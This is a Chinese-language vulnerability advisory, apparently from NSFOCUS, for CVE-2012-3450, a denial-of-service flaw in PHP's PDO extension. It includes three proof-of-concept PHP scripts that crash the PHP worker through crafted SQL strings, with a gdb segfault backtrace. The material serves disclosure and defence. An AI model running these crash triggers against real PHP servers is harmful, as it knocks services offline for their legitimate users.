首页 -> 安全研究
安全研究
安全漏洞
PHP PDO内存访问冲突拒绝服务漏洞
发布日期:2012-08-02
更新日期:2012-08-06
受影响系统:
PHP PHP 5.3.x描述:
PHP PHP 5.2.x
BUGTRAQ ID: 54777
CVE(CAN) ID: CVE-2012-3450
PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的网站编程人员广泛的运用。
PHP 5.4.3及其他版本在实现上存在远程拒绝服务漏洞,攻击者可利用此漏洞造成Web服务器崩溃,拒绝服务合法用户。
<*来源:0x721427D8
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
try {
$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
//tokens:
// SELECT;*;from;'user';/*
//$sql = "SELECT * from 'user'/*";
$stmt = $db->prepare("SELECT * from 'user'".mysql_real_escape_string($_GET['query']));
$stmt->execute();
//crash
$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
$stmt->fetch(PDO::FETCH_BOUND);
print_r( $type);
}
catch (Exception $e)
{
echo "Failed: " . $e->getMessage();
}
?>
-----
<?php
try {
$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
//tokens:
// SELECT;*;from;'user';/*
$sql = ":/*";
$stmt = $db->prepare($sql);
$stmt->execute(); // crashes php worker in pdo_parse_params()
$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
$stmt->fetch(PDO::FETCH_BOUND);
print_r( $type);
} catch (Exception $e) {
echo "Failed: " . $e->getMessage();
}
?>
---
<pre>
<?php
echo "hmm beginning\n";
try {
$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
echo "lets get it on\n";
//tokens:
// SELECT;*;from;'user';/*
$sql = "SELECT * from user :/**";
echo $sql;
$stmt = $db->prepare($sql);
echo "prepared :)\n";
print_r($stmt);
$stmt->execute(); // crashes php worker in pdo_parse_params()
print_r($stmt);
echo "executed :(\n";
$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
$stmt->fetch(PDO::FETCH_BOUND);
echo "--data-\n";
print_r( $type);
echo "--data--\n";
} catch (Exception $e) {
echo "EXCEPTION";
echo "Failed: " . $e->getMessage();
}
echo "hmmm end\n";
?>
</pre>
Actual result:
--------------
root@bt:/opt/lampp# gdb ./bin/php
(gdb) run poc_pdo_linux_short_1.php
Starting program: /opt/lampp/bin/php /opt/lampp/poc_pdo_linux_short_1.php
[Thread debugging using libthread_db enabled]
Program received signal SIGSEGV, Segmentation fault.
0x08228a81 in ?? ()
(gdb) bt
#0 0x08228a81 in ?? ()
#1 0x082280eb in pdo_parse_params ()
#2 0x08223891 in ?? ()
#3 0x084b2aad in ?? ()
#4 0x084b1f87 in execute ()
#5 0x08490ed2 in zend_execute_scripts ()
#6 0x0843f13c in php_execute_script ()
#7 0x08506b46 in main ()
建议:
厂商补丁:
PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.php.net
浏览次数:2438
严重程度:0(网友投票)
绿盟科技给您安全的保障